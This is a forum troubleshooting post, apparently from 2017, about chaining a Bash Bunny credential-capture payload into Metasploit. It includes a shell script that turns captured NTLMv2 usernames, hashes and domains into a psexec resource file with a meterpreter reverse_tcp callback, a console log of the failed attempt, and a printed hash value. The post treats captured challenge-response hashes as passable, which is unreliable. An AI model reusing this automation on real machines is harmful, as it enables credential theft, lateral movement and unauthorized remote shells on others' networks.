Maestropastelero Posted October 23, 2017 Share Posted October 23, 2017 This is not a 100% BashBunny topic, but it is related and I think all the newbies like me could be interested. I 've used Metasploit in a Kali laptop with a post mimikatz module loaded and dump NTLMv2 hashes fine. Takes a Superuser account hash, and use exploit/windows/smb/psexec for accessing other computers on the same network. Then I realize I can setup msf on my BB. Running V1.3 on my BB, I setup Metasploit following this guide : https://steemit.com/technology/@cronetos/install-metasploit-framework-on-the-bash-bunny-or-other-debian-related-distros First, it melt my brain as it didn't work and I am not super skilled on this matters, but after some Gems uninstall/install/downgrade I finally make it works. Then I used the quickcreds payload for getting the hashes through the USB and when that is done, I build a RC file that it pass to the msfconsole -r. So far so good. Metasploit takes like 1 minute to load, but it works. The problem is when it try to exploit it, I always get Login Error : execution expired The main question is: are the hashes on hashdump somehow different than the hashes that quickcreds provides? (I hope that don't sounds too newbie) Or anyone see anything bad on what I am doing here? This is the log I got from metasploit : =[ metasploit v4.15.7-dev-70a82b5 ] + -- --=[ 1674 exploits - 960 auxiliary - 295 post ] + -- --=[ 489 payloads - 40 encoders - 9 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing /root/udisk/loot/quickcreds/LAPTOP1/conf.txt for ERB directives. resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> use exploit/windows/smb/psexec resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LHOST 172.16.64.1 LHOST => 172.16.64.1 resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LPORT 443 LPORT => 443 resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set RHOST 172.16.64.10 RHOST => 172.16.64.10 resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBUser myusername SMBUser => myusername resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBPass df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB SMBPass => df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBDomain OFFICEDOMAIN SMBDomain => OFFICEDOMAIN resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> exploit -j [*] Exploit running as background job. resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> sleep 20 [*] Started reverse TCP handler on 172.16.64.1:443 [*] 172.16.64.10:445 - Connecting to the server... [*] 172.16.64.10:445 - Authenticating to 172.16.64.10:445|OFFICEDOMAIN as user 'myusername'...[-] 172.16.64.10:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired --------------------------------------------------------------------------------------------------- This is what I added to the payload to test it (ugly code, it is just a test): echo "use exploit/windows/smb/psexec" > $LOOTDIR/$HOST-$COUNT/conf.txt echo "set payload windows/meterpreter/reverse_tcp" >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "set LHOST 172.16.64.1" >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "set LPORT 443" >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "set RHOST ${TARGET_IP}" >> $LOOTDIR/$HOST-$COUNT/conf.txt head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBUser "$1}' >> $LOOTDIR/$HOST-$COUNT/conf.txt head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBPass "$4":"$5}' >> $LOOTDIR/$HOST-$COUNT/conf.txt head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBDomain "$3}' >> $LOOTDIR/$HOST-$COUNT/conf.txt echo "exploit -j" >> $LOOTDIR/$HOST-$COUNT/conf.txt export HOME=/root source /etc/profile.d/rvm.sh cd /root/metasploit-framework/ ./msfconsole -r $LOOTDIR/$HOST-$COUNT/conf.txt &>> /root/msf.log Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.